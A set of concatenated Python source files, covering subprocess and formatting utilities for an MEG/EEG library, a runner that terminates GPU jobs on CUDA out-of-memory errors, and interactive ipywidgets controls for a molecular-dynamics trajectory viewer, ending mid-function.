def running_subprocess(command, after="wait", verbose=None, *args, **kwargs):
"""Context manager to do something with a command running via Popen.
Parameters
----------
command : list of str | str
Command to run as subprocess (see :class:`python:subprocess.Popen`).
after : str
Can be:
- "wait" to use :meth:`~python:subprocess.Popen.wait`
- "communicate" to use :meth:`~python.subprocess.Popen.communicate`
- "terminate" to use :meth:`~python:subprocess.Popen.terminate`
- "kill" to use :meth:`~python:subprocess.Popen.kill`
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
p : instance of Popen
The process.
"""
_validate_type(after, str, 'after')
_check_option('after', after, ['wait', 'terminate', 'kill', 'communicate'])
for stdxxx, sys_stdxxx in (['stderr', sys.stderr], ['stdout', sys.stdout]):
if stdxxx not in kwargs:
kwargs[stdxxx] = subprocess.PIPE
# Check the PATH environment variable. If run_subprocess() is to be called
# frequently this should be refactored so as to only check the path once.
env = kwargs.get('env', os.environ)
if any(p.startswith('~') for p in env['PATH'].split(os.pathsep)):
warn('Your PATH environment variable contains at least one path '
'starting with a tilde ("~") character. Such paths are not '
'interpreted correctly from within Python. It is recommended '
'that you use "$HOME" instead of "~".')
if isinstance(command, str):
command_str = command
else:
command = [str(s) for s in command]
command_str = ' '.join(s for s in command)
logger.info("Running subprocess: %s" % command_str)
try:
p = subprocess.Popen(command, *args, **kwargs)
except Exception:
if isinstance(command, str):
command_name = command.split()[0]
else:
command_name = command[0]
logger.error('Command not found: %s' % command_name)
raise
try:
yield p
finally:
getattr(p, after)()
p.wait()
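# Editor's usage sketch (not part of the original module): interact with the
# process while it runs; on exit the context manager calls p.wait() (the
# default ``after``).
def _example_running_subprocess():
    with running_subprocess([sys.executable, '-c', 'print("hi")']) as p:
        out, _ = p.communicate()  # stdout/stderr default to subprocess.PIPE
    return out.decode('utf-8'), p.returncode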
def _clean_names(names, remove_whitespace=False, before_dash=True):
"""Remove white-space on topo matching.
This function handles different naming conventions for old vs. new
VectorView systems (`remove_whitespace`). It also allows removing
system-specific parts of CTF channel names (`before_dash`).
Usage
-----
# for new VectorView (only inside layout)
ch_names = _clean_names(epochs.ch_names, remove_whitespace=True)
# for CTF
ch_names = _clean_names(epochs.ch_names, before_dash=True)
"""
cleaned = []
for name in names:
if ' ' in name and remove_whitespace:
name = name.replace(' ', '')
if '-' in name and before_dash:
name = name.split('-')[0]
if name.endswith('_v'):
name = name[:-2]
cleaned.append(name)
return cleaned
def _get_argvalues():
"""Return all arguments (except self) and values of read_raw_xxx."""
# call stack
# read_raw_xxx -> <decorator-gen-000> -> BaseRaw.__init__ -> _get_argvalues
# This is equivalent to `frame = inspect.stack(0)[4][0]` but faster
frame = inspect.currentframe()
try:
for _ in range(3):
frame = frame.f_back
fname = frame.f_code.co_filename
if not fnmatch.fnmatch(fname, '*/mne/io/*'):
return None
args, _, _, values = inspect.getargvalues(frame)
finally:
del frame
params = dict()
for arg in args:
params[arg] = values[arg]
params.pop('self', None)
return params
def sizeof_fmt(num):
"""Turn number of bytes into human-readable str.
Parameters
----------
num : int
The number of bytes.
Returns
-------
size : str
The size in human-readable format.
"""
units = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB']
decimals = [0, 0, 1, 2, 2, 2]
if num > 1:
exponent = min(int(log(num, 1024)), len(units) - 1)
quotient = float(num) / 1024 ** exponent
unit = units[exponent]
num_decimals = decimals[exponent]
format_string = '{0:.%sf} {1}' % (num_decimals)
return format_string.format(quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
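# Editor's examples (not in the original) of the formatting above:
#     sizeof_fmt(0)            -> '0 bytes'
#     sizeof_fmt(1)            -> '1 byte'
#     sizeof_fmt(2048)         -> '2 kB'      (kB uses 0 decimals)
#     sizeof_fmt(5 * 1024**2)  -> '5.0 MB'    (MB uses 1 decimal)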
def _file_like(obj):
# An alternative would be::
#
# isinstance(obj, (TextIOBase, BufferedIOBase, RawIOBase, IOBase))
#
# but this might be more robust to file-like objects not properly
# inheriting from these classes:
return all(callable(getattr(obj, name, None)) for name in ('read', 'seek'))
def _assert_no_instances(cls, when=''):
__tracebackhide__ = True
n = 0
ref = list()
gc.collect()
objs = gc.get_objects()
for obj in objs:
try:
check = isinstance(obj, cls)
except Exception: # such as a weakref
check = False
if check:
rr = gc.get_referrers(obj)
count = 0
for r in rr:
if r is not objs and \
r is not globals() and \
r is not locals() and \
not inspect.isframe(r):
if isinstance(r, (list, dict)):
rep = f'len={len(r)}'
r_ = gc.get_referrers(r)
types = (x.__class__.__name__ for x in r_)
types = "/".join(sorted(set(
x for x in types if x is not None)))
rep += f', {len(r_)} referrers: {types}'
del r_
else:
rep = repr(r)[:100].replace('\n', ' ')
ref.append(f'{r.__class__.__name__}: {rep}')
count += 1
del r
del rr
n += count > 0
assert n == 0, f'{n} {when}:\n' + '\n'.join(ref)
def _resource_path(submodule, filename):
"""Return a full system path to a package resource (AKA a file).
Parameters
----------
submodule : str
An import-style module or submodule name
(e.g., "mne.datasets.testing").
filename : str
The file whose full path you want.
Returns
-------
path : str
The full system path to the requested file.
"""
try:
from importlib.resources import files
return files(submodule).joinpath(filename)
except ImportError:
from pkg_resources import resource_filename
return resource_filename(submodule, filename)
|
runners.py
|
"""
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import signal
import subprocess
import sys
import time
from queue import Empty, Queue
from threading import Thread
from .misc import log_shell_cmd
class NonBlockingStreamReader:
def __init__(self, stream):
self.stream = stream
self.queue = Queue()
def populate_queue(stream, queue):
while True:
line = stream.readline()
if line:
queue.put(line)
else:
time.sleep(1)
self.thread = Thread(target=populate_queue, args=(self.stream, self.queue))
self.thread.daemon = True
self.thread.start()
def readline(self, timeout=None):
try:
return self.queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
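# Editor's usage sketch (not part of the original module): wrap a Popen stream
# so readline() returns None instead of blocking when no output is available.
def _example_non_blocking_reader():
    proc = subprocess.Popen([sys.executable, '-c', 'print("ready")'],
                            stdout=subprocess.PIPE)
    reader = NonBlockingStreamReader(proc.stdout)
    line = reader.readline(timeout=0.5)  # bytes, or None if nothing arrived yet
    proc.wait()
    return line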
def run_with_termination(cmd):
log_shell_cmd(cmd, 'Running the command with termination support')
# Start the child in its own session so that the os.killpg() call below only
# terminates the child's process group, not the current process.
process = subprocess.Popen(cmd, stderr=subprocess.PIPE, start_new_session=True)
nbsr_err = NonBlockingStreamReader(process.stderr)
failure_word = 'CUDA out of memory'
while process.poll() is None:
stderr = nbsr_err.readline(0.1)
if stderr is None:
time.sleep(1)
continue
stderr = stderr.decode('utf-8')
print(stderr, end='')
sys.stdout.flush()
if failure_word in stderr:
try:
print('\nTerminated because of:', failure_word)
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
except ProcessLookupError as e:
print(e)
while True:
stderr = nbsr_err.readline(0.1)
if not stderr:
break
stderr = stderr.decode('utf-8')
print(stderr, end='')
sys.stdout.flush()
time.sleep(1)
err = f'Out of memory: Killed process {process.pid}'
proc = subprocess.Popen(['dmesg', '-l', 'err'], stdout=subprocess.PIPE)
out = proc.communicate()[0].decode().split('\n')
for line in out:
if err in line:
raise RuntimeError(line)
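# Editor's note (hypothetical usage; script name and flags are placeholders):
# run_with_termination() is intended for long-running GPU jobs whose stderr may
# report "CUDA out of memory", e.g.
#     run_with_termination(['python', 'train.py', '--batch-size', '256'])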
|
core.py
|
# @Author: Arthur Voronin
# @Date: 17.04.2021
# @Filename: core.py
# @Last modified by: arthur
# @Last modified time: 16.09.2021
"""
.. hint:: This module contains functions enabling interactive analyses. Its main
parts are the iPlayer and iPlot classes, which allow the use of a trajectory
viewer or a dynamic linking of the trajectory viewer and any 2D graph.
Example:
--------
.. code-block:: python
import MDAnalysis as mda
import pyrexMD.misc as misc
import pyrexMD.core as core
import pyrexMD.analysis.contacts as con
ref = mda.Universe("<pdb_file>")
mobile = mda.Universe("<tpr_file>", "<xtc_file>")
# show ref structure in trajectory viewer
tv = core.iPlayer(ref)
tv()
# check for formed bias contacts
bias = misc.read_file("path/to/bias/contacts", usecols=(0,1))
FRAMES, QBIAS, CM = con.get_Qbias(mobile, bias)
# interactive plot (ctrl-click into the plot to jump to frame)
ip = core.iPlot(mobile, xdata=FRAMES, ydata=QBIAS, xlabel="frame", ylabel="Qbias")
ip()
Content:
--------
"""
# core module
from builtins import super
from IPython.display import display
import ipywidgets as wg
import numpy as np
import nglview as ngl
import MDAnalysis as mda
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import pyperclip # copy&paste to clipboard
import threading
import time
# global update for plots
matplotlib.rcParams.update({'font.family': "sans-serif", 'font.weight': "normal", 'font.size': 16})
cp = sns.color_palette()
"""
access seaborn colors via core.cp[0] - core.cp[9]
"""
# TODO: get_color_scheme for any component after checking the length of the component (instead of universe?)
# TODO: if if if -> if elif else
class iColor(object):
def __init__(self, iPlayer_cls):
self._iPlayer = iPlayer_cls
return
def get_color_scheme(self, color, universe=None):
"""
Returns color scheme.
Args:
color (str)
universe (universe, atomgrp)
Returns:
color_scheme (array)
HEX colors for each RES taken from iPlayer.universe (default) or universe.
Accepted colors (simple):
| 'red' 'black'
| 'orange' 'grey_80'
| 'yellow' 'grey_60'
| 'green' 'grey_40'
| 'cyan' 'grey_20'
| 'blue' 'white'
| 'purple'
| 'magenta'
Accepted colors (complex):
| 'baw': black and white
| 'b/w': black and white
| 'rainbow': red to magenta
"""
color = str(color)
if universe != None:
length = len(universe.residues)
else:
length = len(self._iPlayer.universe.residues)
# simple color schemes
color_scheme_s = {'red': ['0xFF0000'],
'orange': ['0xFF9900'],
'yellow': ['0xFFFF00'],
'green': ['0x00FF00'],
'cyan': ['0x00FFFF'],
'blue': ['0x0000FF'],
'purple': ['0x9900FF'],
'magenta': ['0xFF00FF'],
'black': ['0x000000'],
'grey_80': ['0x444444'],
'grey_60': ['0x666666'],
'grey_40': ['0x999999'],
'grey_20': ['0xCCCCCC'],
'white': ['0xFFFFFF']
}
# complex color schemes
color_scheme_c = {'rainbow': [color_scheme_s['red'],
color_scheme_s['orange'],
color_scheme_s['yellow'],
color_scheme_s['green'],
color_scheme_s['cyan'],
color_scheme_s['blue'],
color_scheme_s['purple'],
color_scheme_s['magenta']],
'baw': [color_scheme_s['black'],
color_scheme_s['grey_80'],
color_scheme_s['grey_60'],
color_scheme_s['grey_40'],
color_scheme_s['grey_20'],
color_scheme_s['white']],
'b/w': [color_scheme_s['black'],
color_scheme_s['grey_80'],
color_scheme_s['grey_60'],
color_scheme_s['grey_40'],
color_scheme_s['grey_20'],
color_scheme_s['white']]
}
# simple
if color in color_scheme_s:
color_scheme = color_scheme_s[color] * length
# complex
elif color in color_scheme_c:
color_scheme = color_scheme_c[color]
if length % len(color_scheme) == 0:
repeat = length // len(color_scheme)
else:
repeat = 1 + length // len(color_scheme)
color_scheme = list(np.repeat(color_scheme, repeat))
# non-existing color schemes
else:
print("Color scheme does not exist!")
return(color_scheme)
def set_color_scheme(self, color, ci=None):
"""
Applies color scheme. If ci=None, the target component is determined by <iPlayer_object>.widgets.Components.description.
Args:
color (str)
ci (None, int): component index (0 or 1). If None, use the currently
selected component.
Accepted colors (simple):
| 'red' 'black'
| 'orange' 'grey_80'
| 'yellow' 'grey_60'
| 'green' 'grey_40'
| 'cyan' 'grey_20'
| 'blue' 'white'
| 'purple'
| 'magenta'
Accepted colors (complex):
| 'baw': black and white
| 'b/w': black and white
| 'rainbow': red to magenta
"""
color_schemes = ['red', 'yellow', 'orange', 'green',
'cyan', 'blue', 'purple', 'magenta',
'black', 'grey_80', 'grey_60', 'grey_40',
'grey_20', 'white', 'baw', 'b/w', 'rainbow']
color_scheme_str = None
# check for existing color schemes
if color in color_schemes:
color_scheme_str = color
color = self.get_color_scheme(color)
# update dict / remember color scheme
if ci == None:
ci = self._iPlayer.widgets.Components.description.split()[-1]
if color_scheme_str != None:
if ci == '0':
self._iPlayer.widgets._dict_Component_0['Color_Scheme'] = color_scheme_str
elif ci == '1':
self._iPlayer.widgets._dict_Component_1['Color_Scheme'] = color_scheme_str
else:
if ci == '0':
self._iPlayer.widgets._dict_Component_0['Color_Scheme'] = color
elif ci == '1':
self._iPlayer.widgets._dict_Component_1['Color_Scheme'] = color
# apply color scheme
for ri in range(0, 5):
self._iPlayer.player._set_color_by_residue(color, component_index=ci, repr_index=ri)
return
class iWidgets(object):
def __init__(self, iPlayer_cls):
# align via wg.<type>(..., **.align_kw)
align_kw = dict(_css=(('.widget-label', 'min-width', '20ex'),),
margin='0px 0px 5px 12px')
# Marie stuff start
self.YValue = wg.Button(description='', tooltip='click: find global minimum')
self.FrameTime = wg.Button(description='Time: ' + str(0) + ' ps', tooltip='click: switch between Time and Frame')
# Marie stuff end
self.Frame = wg.ToggleButton(value=False, description='Frame: ' + str(0),
button_style='', tooltip='click: copy frame to clipboard', disabled=False)
self.Time = wg.ToggleButton(value=False, description='Time: ' + str(0) + ' ps',
button_style='', tooltip='click: copy time to clipboard', disabled=False)
self.Reset = wg.ToggleButton(value=False, description='Reset View', button_style='')
self.UI = wg.ToggleButton(value=False, description='Hide UI')
self.PlayerStep = wg.IntSlider(value=1, min=1, max=500, description='Step',
layout=wg.Layout(width='230px'), **align_kw)
self.Components = wg.ToggleButton(value=False, description='Component 0', button_style='info')
self._Component_0 = wg.ToggleButton(value=False, description='Component 0', button_style='',
layout=wg.Layout(display='none'))
self._Component_1 = wg.ToggleButton(value=False, description='Component 1', button_style='',
layout=wg.Layout(display='none'))
self.Representation = wg.ToggleButton(value=False, description='Representation', button_style='info')
self._Cartoon = wg.ToggleButton(value=True, description='Cartoon', button_style='',
layout=wg.Layout(display='none'))
self._BaS = wg.ToggleButton(value=False, description='Ball & Stick', button_style='',
layout=wg.Layout(display='none'))
self._Surface = wg.ToggleButton(value=False, description='Surface', button_style='',
layout=wg.Layout(display='none'))
self._Visibility = wg.ToggleButton(value=True, description='Visibility')
self.Color = wg.ToggleButton(value=False, description='Color', button_style='info')
self.Color_by_RES = wg.ToggleButton(value=False, description='Color by RES', button_style='')
self._Color_red = wg.ToggleButton(value=False, description='Red', button_style='',
layout=wg.Layout(display='none'))
self._Color_orange = wg.ToggleButton(value=False, description='Orange', button_style='',
layout=wg.Layout(display='none'))
self._Color_yellow = wg.ToggleButton(value=False, description='Yellow', button_style='',
layout=wg.Layout(display='none'))
self._Color_green = wg.ToggleButton(value=False, description='Green', button_style='',
layout=wg.Layout(display='none'))
self._Color_cyan = wg.ToggleButton(value=False, description='Cyan', button_style='',
layout=wg.Layout(display='none'))
self._Color_blue = wg.ToggleButton(value=False, description='Blue', button_style='',
layout=wg.Layout(display='none'))
self._Color_purple = wg.ToggleButton(value=False, description='Purple', button_style='',
layout=wg.Layout(display='none'))
self._Color_magenta = wg.ToggleButton(value=False, description='Magenta', button_style='',
layout=wg.Layout(display='none'))
self._Color_black = wg.ToggleButton(value=False, description='Black', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_80 = wg.ToggleButton(value=False, description='Grey 80', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_60 = wg.ToggleButton(value=False, description='Grey 60', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_40 = wg.ToggleButton(value=False, description='Grey 40', button_style='',
layout=wg.Layout(display='none'))
self._Color_grey_20 = wg.ToggleButton(value=False, description='Grey 20', button_style='',
layout=wg.Layout(display='none'))
self._Color_white = wg.ToggleButton(value=False, description='White', button_style='',
layout=wg.Layout(display='none'))
self._Color_baw = wg.ToggleButton(value=False, description='B/W', button_style='',
layout=wg.Layout(display='none'))
self._Color_rainbow = wg.ToggleButton(value=False, description='Rainbow', button_style='',
layout=wg.Layout(display='none'))
# dict: remember representation of component 0
self._dict_Component_0 = {'Cartoon': True,
'BaS': False,
'Surface': False,
'Visibility': True,
'Color_Scheme': 'rainbow'}
# dict: remember representation of component 1
self._dict_Component_1 = {'Cartoon': True,
'BaS': False,
'Surface': False,
'Visibility': True,
'Color_Scheme': 'rainbow'}
# list: remember last chosen component
self._track_Components = ['Component 0']
# make widgets interactive
def switch_FrameTime(a):
"""
switch <iPlayer_object>.widgets.FrameTime description between:
- <iPlayer_object>.widgets.Frame.description
- <iPlayer_object>.widgets.Time.description
"""
if 'Frame' in self.FrameTime.description:
self.FrameTime.description = self.Time.description
else:
self.FrameTime.description = self.Frame.description
self.FrameTime.on_click(switch_FrameTime)
def update_FrameTime(args):
"""
Update <iPlayer_object>.widgets.FrameTime.description
"""
frame = args['new']
time = int(frame * iPlayer_cls.universe.trajectory.dt) # time in ps
if 'Frame' in self.FrameTime.description:
self.FrameTime.description = 'Frame: {}'.format(frame)
else:
self.FrameTime.description = 'Time: {} ps'.format(time)
iPlayer_cls.player.observe(update_FrameTime, 'frame')
def update_Frame(args):
"""
Update <iPlayer_object>.widgets.Frame.description
"""
frame = args['new']
self.Frame.description = 'Frame: {}'.format(frame)
iPlayer_cls.player.observe(update_Frame, 'frame')
def update_Time(args):
"""
Update <iPlayer_object>.widgets.Time.description
"""
frame = args['new']
time = int(frame * iPlayer_cls.universe.trajectory.dt) # time in ps
self.Time.description = 'Time: {} ps'.format(time)
iPlayer_cls.player.observe(update_Time, 'frame')
def copy_Frame(a):
"""
Copy frame of <iPlayer_object>.widgets.Frame.description on clicking the button.
"""
self.Frame.value = False
a = str(self.Frame.description.split(': ')[-1])
pyperclip.copy(a)
wg.interactive(copy_Frame, a=self.Frame)
def copy_Time(a):
"""
Copy time of <iPlayer_object>.widgets.Time.description on clicking the button.
"""
self.Time.value = False
a = str(self.Time.description.split(': ')[-1])
pyperclip.copy(a)
wg.interactive(copy_Time, a=self.Time)
def reset_view(a):
"""
Reset camera view orientation (center+rotate).
"""
self.Reset.value = False
# iPlayer_cls.player.center() #camera orientation is already centered
iPlayer_cls.player._set_camera_orientation(iPlayer_cls.player._camera_orientation_at_start)
wg.interactive(reset_view, a=self.Reset)
def toggle_Visibility(a):
"""
Toggle Representation -> Visibility of components.
"""
if self.Components.description == 'Component 0' and a == True:
iPlayer_cls.player.component_0.show()
if self.Components.description == 'Component 0' and a == False:
iPlayer_cls.player.component_0.hide()
if self.Components.description == 'Component 1' and a == True:
iPlayer_cls.player.component_1.show()
if self.Components.description == 'Component 1' and a == False:
iPlayer_cls.player.component_1.hide()
wg.interactive(toggle_Visibility, a=self._Visibility)
def dropdown_Components(a):
"""
Dropdown menu effect for <iPlayer_object>.widgets.Components button.
"""
if self.Components.value:
self._Component_0.layout = wg.Layout(display='visible')
else:
self._Component_0.layout = wg.Layout(display='none')
wg.interactive(dropdown_Components, a=self.Components)
# mimic layout of _Component_0 button
wg.jsdlink((self._Component_0, 'layout'), (self._Component_1, 'layout'))
def dropdown_Representation(a):
"""
Dropdown menu effect for <iPlayer_object>.widgets.Representations button.
"""
if self.Representation.value:
self._Cartoon.layout = wg.Layout(display='visible')
else:
self._Cartoon.layout = wg.Layout(display='none')
return
wg.interactive(dropdown_Representation, a=self.Representation)
# mimic layout of Cartoon button
wg.jsdlink((self._Cartoon, 'layout'), (self._BaS, 'layout'))
wg.jsdlink((self._Cartoon, 'layout'), (self._Surface, 'layout'))
wg.jsdlink((self._Cartoon, 'layout'), (self._Visibility, 'layout'))
def dropdown_Color(a):
"""
Dropdown menu effect for <iPlayer_object>.widgets.Color button.
"""
if self.Color.value:
self._Color_red.layout = wg.Layout(display='visible')
else:
self._Color_red.layout = wg.Layout(display='none')
return
wg.interactive(dropdown_Color, a=self.Color)
# mimic layout of Color_red button
wg.jsdlink((self._Color_red, 'layout'), (self._Color_orange, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_yellow, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_green, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_cyan, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_blue, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_purple, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_magenta, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_black, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_80, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_60, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_40, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_grey_20, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_white, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_baw, 'layout'))
wg.jsdlink((self._Color_red, 'layout'), (self._Color_rainbow, 'layout'))
# toggle UI (method is defined below in iWidgets class)
# mimic layout of Hide/Show UI button
wg.jsdlink((self.Representation, 'layout'), (self.Color, 'layout'))
wg.jsdlink((self.Representation, 'layout'), (self.Color_by_RES, 'layout'))
wg.jsdlink((self.Representation, 'layout'), (self.Components, 'layout'))
wg.interactive(self.toggle_UI, a=self.UI)
def update_PlayerStep(step):
"""
Update step/speed of <iPlayer_object>.widgets.PlayerStep.
"""
iPlayer_cls.player.player.step = step
return
wg.interactive(update_PlayerStep, step=self.PlayerStep)
def update_Components(a):
"""
Update <iPlayer_object>.widgets.Components.
"""
if self._Component_0.value:
self._Component_0.value = False
self.Components.description = 'Component 0'
elif self._Component_1.value:
self._Component_1.value = False
self.Components.description = 'Component 1'
if self.Components.description == 'Component 0'\
and self.Components.description != self._track_Components[-1]:
# set dict values
self._dict_Component_1['Cartoon'] = self._Cartoon.value
self._dict_Component_1['BaS'] = self._BaS.value
self._dict_Component_1['Surface'] = self._Surface.value
self._dict_Component_1['Visibility'] = self._Visibility.value
# load dict values
self._track_Components.append(self.Components.description)
self._Cartoon.value = self._dict_Component_0['Cartoon']
self._BaS.value = self._dict_Component_0['BaS']
self._Surface.value = self._dict_Component_0['Surface']
self._Visibility.value = self._dict_Component_0['Visibility']
elif self.Components.description == 'Component 1'\
and self.Components.description != self._track_Components[-1]:
# set dict values
self._dict_Component_0['Cartoon'] = self._Cartoon.value
self._dict_Component_0['BaS'] = self._BaS.value
self._dict_Component_0['Surface'] = self._Surface.value
self._dict_Component_0['Visibility'] = self._Visibility.value
# load dict values
self._track_Components.append(self.Components.description)
self._Cartoon.value = self._dict_Component_1['Cartoon']
self._BaS.value = self._dict_Component_1['BaS']
self._Surface.value = self._dict_Component_1['Surface']
self._Visibility.value = self._dict_Component_1['Visibility']
else: # todo: Distances code
pass
return
wg.interactive(update_Components, a=self._Component_0)
wg.interactive(update_Components, a=self._Component_1)
def update_Representation(Cartoon, BaS, Surface):
"""
Updates representation via add/remove command.
Colors the representation by looking up the color scheme in hidden dictionary.
Args:
Cartoon (bool)
BaS (bool)
Surface (bool)
"""
if iPlayer_cls.widgets.Components.description == 'Component 0':
iPlayer_cls.player.component_0.clear_representations()
if Cartoon:
iPlayer_cls.player.component_0.add_cartoon(selection="protein rna", color="green")
if BaS:
iPlayer_cls.player.component_0.add_ball_and_stick(selection="all")
if Surface:
iPlayer_cls.player.component_0.add_surface(selection="protein rna", color='blue',
wireframe=True, opacity=0.2, isolevel=3.)
cs = iPlayer_cls.widgets._dict_Component_0['Color_Scheme']
iPlayer_cls.color.set_color_scheme(cs)
if iPlayer_cls.widgets.Components.description == 'Component 1':
iPlayer_cls.player.component_1.clear_representations()
if Cartoon:
iPlayer_cls.player.component_1.add_cartoon(selection="protein rna", color="green")
if BaS:
iPlayer_cls.player.component_1.add_ball_and_stick(selection="all")
if Surface:
iPlayer_cls.player.component_1.add_surface(selection="protein rna", color='blue',
wireframe=True, opacity=0.2, isolevel=3.)
cs = iPlayer_cls.widgets._dict_Component_1['Color_Scheme']
iPlayer_cls.color.set_color_scheme(cs)
return
wg.interactive(update_Representation, Cartoon=self._Cartoon, BaS=self._BaS,
Surface=self._Surface)
def update_Color(a):
"""
Update color of representation.
"""
# simple color schemes
if self._Color_red.value:
self._Color_red.value = False
iPlayer_cls.color.set_color_scheme('red')
if self._Color_orange.value:
self._Color_orange.value = False
iPlayer_cls.color.set_color_scheme('orange')
if self._Color_yellow.value:
self._Color_yellow.value = False
iPlayer_cls.color.set_color_scheme('yellow')
if self._Color_green.value:
self._Color_green.value = False
iPlayer_cls.color.set_color_scheme('green')
if self._Color_cyan.value:
self._Color_cyan.value = False
iPlayer_cls.color.set_color_scheme('cyan')
if self._Color_blue.value:
self._Color_blue.value = False
iPlayer_cls.color.set_color_scheme('blue')
if self._Color_purple.value:
self._Color_purple.value = False
iPlayer_cls.color.set_color_scheme('purple')
if self._Color_magenta.value:
self._Color_magenta.value = False
iPlayer_cls.color.set_color_scheme('magenta')
if self._Color_black.value:
self._Color_black.value = False
iPlayer_cls.color.set_color_scheme('black')
if self._Color_grey_80.value:
self._Color_grey_80.value = False
iPlayer_cls.color.set_color_scheme('grey_80')
if self._Color_grey_60.value:
self._Color_grey_60.value = False
iPlayer_cls.color.set_color_scheme('grey_60')
if self._Color_grey_40.value:
self._Color_grey_40.value = False
iPlayer_cls.color.set_color_scheme('grey_40')
if self._Color_grey_20.value:
self._Color_grey_20.value = False
iPlayer_cls.color.set_color_scheme('grey_20')
if self._Color_white.value:
self._Color_white.value = False
iPlayer_cls.color.set_color_scheme('white')
# complex color schemes
if self._Color_baw.value:
self._Color_baw.value = False
iPlayer_cls.color.set_color_scheme('b/w')
if self._Color_rainbow.value:
self._Color_rainbow.value = False
iPlayer_cls.color.set_color_scheme('rainbow')
return
wg.interactive(update_Color, a=self._Color_red)
wg.interactive(update_Color, a=self._Color_orange)
wg.interactive(update_Color, a=self._Color_yellow)
wg.interactive(update_Color, a=self._Color_green)
wg.interactive(update_Color, a=self._Color_cyan)
wg.interactive(update_Color, a=self._Color_blue)
wg.interactive(update_Color, a=self._Color_purple)
wg.interactive(update_Color, a=self._Color_magenta)
wg.interactive(update_Color, a=self._Color_black)
wg.interactive(update_Color, a=self._Color_grey_80)
wg.interactive(update_Color, a=self._Color_grey_60)
wg.interactive(update_Color, a=self._Color_grey_40)
wg.interactive(update_Color, a=self._Color_grey_20)
wg.interactive(update_Color, a=self._Color_white)
wg.interactive(update_Color, a=self._Color_baw)
wg.interactive(update_Color, a=self._Color_rainbow)
def click_Color_by_RES(a):
"""
Color by RES / Apply 'rainbow' color scheme on representation.
"""
self.Color_by_RES.value = False
iPlayer_cls.color.set_color_scheme('rainbow')
wg.interactive(click_Color_by_RES, a=self.Color_by_RES)
return
def __repr__(self):
return "<iWidgets Class>"
def toggle_UI(self, a=None):
"""
Toggle UI with a=True/False. If a=None, the UI switches to the other state.
"""
if a == True and self.UI.value == False:
self.UI.description = 'True'
elif a == False and self.UI.value == False:
self.UI.description = 'False'
if self.UI.description == 'Show UI' or self.UI.description == 'True':
self.UI.value = False
self.UI.description = 'Hide UI'
self.Components.layout = wg.Layout(width='148px', display='visible')
self.Representation.layout = wg.Layout(display='visible')
elif self.UI.description == 'Hide UI' or self.UI.description == 'False':
self.UI.value = False
self.UI.description = 'Show UI'
self.Components.layout = wg.Layout(display="none")
self.Representation.layout = wg.Layout(display='none')
self._Cartoon.layout = wg.Layout(display='none')
self._Color_red.layout = wg.Layout(display='none')
self._Component_0.layout = wg.Layout(display='none')
# change values of dropdown menus after toggle
self.Components.value = False
self.Representation.value = False
self.Color.value = False
return
class iPlayer(object):
def __init__(self, universe=None):
"""
init iPlayer
- if universe is PDB ID (str with len = 4) -> fetch online
- if universe is path (str with len > 4) -> create universe
- if universe is universe -> pass universe
"""
# case 1: input is PDB ID -> fetch online
if type(universe) is str and len(universe) == 4:
self.universe = mda.fetch_mmtf(universe)
self.player = ngl.show_mdanalysis(self.universe)
# case 2: input is path -> create MDA Universe
elif type(universe) is str and len(universe) > 4:
self.universe = mda.Universe(universe)
self.player = ngl.show_mdanalysis(self.universe)
# case 3: input is MDA Universe
else:
self.universe = universe
self.player = ngl.show_mdanalysis(self.universe)
self.player._camera_orientation_at_start = None
self.color = iColor(self)
self.widgets = iWidgets(self)
self.widgets.toggle_UI(False)
self._init_Representation()
return
def __call__(self, layout='default'):
"""
Show trajectory viewer with GUI.
Args:
layout (str):
| 'default': default layout
| 'every other str': non-default layout
.. Note:: Alternatively execute show_player() method by calling the object.
Example:
| tv = core.iPlayer(<universe>)
| tv() # short version of tv.show_player()
"""
self.show_player(layout)
return
def __repr__(self):
return('''iPlayer object:\n {}\n <Trajectory with {} frames>\n <{}>'''.format(
self.universe, len(self.universe.trajectory), self.player))
def _init_Representation(self):
"""
Init representation
"""
self.color.set_color_scheme('rainbow')
return
def _save_camera_orientation(self):
time.sleep(1)
if self.player._camera_orientation_at_start == None:
self.player._camera_orientation_at_start = self.player._camera_orientation
return
def _update_player_layout(self, layout='default'):
"""
update player layout
"""
self.player._layout = layout # needed for show_plot() function
self.widgets.YValue.layout = wg.Layout(display='none')
if '+' in layout:
self.widgets.YValue.layout = wg.Layout(display='visible')
return
def sync_view(self):
"""
Alias for <iPlayer_object>.player.sync_view().
"""
self.player.sync_view()
return
def show_player(self, layout='default'):
"""
Show trajectory viewer with GUI.
Args:
layout (str):
| 'default': default layout
| 'Marie': special layout for special person
Alternative:
Execute show_player() method by calling the object.
Example:
tv = core.iPlayer(<universe>)
tv() # short version of tv.show_player()
"""
if 'Marie' in layout:
tv_and_widgets = wg.VBox([wg.HBox([self.widgets.FrameTime, self.widgets.YValue]),
self.player,
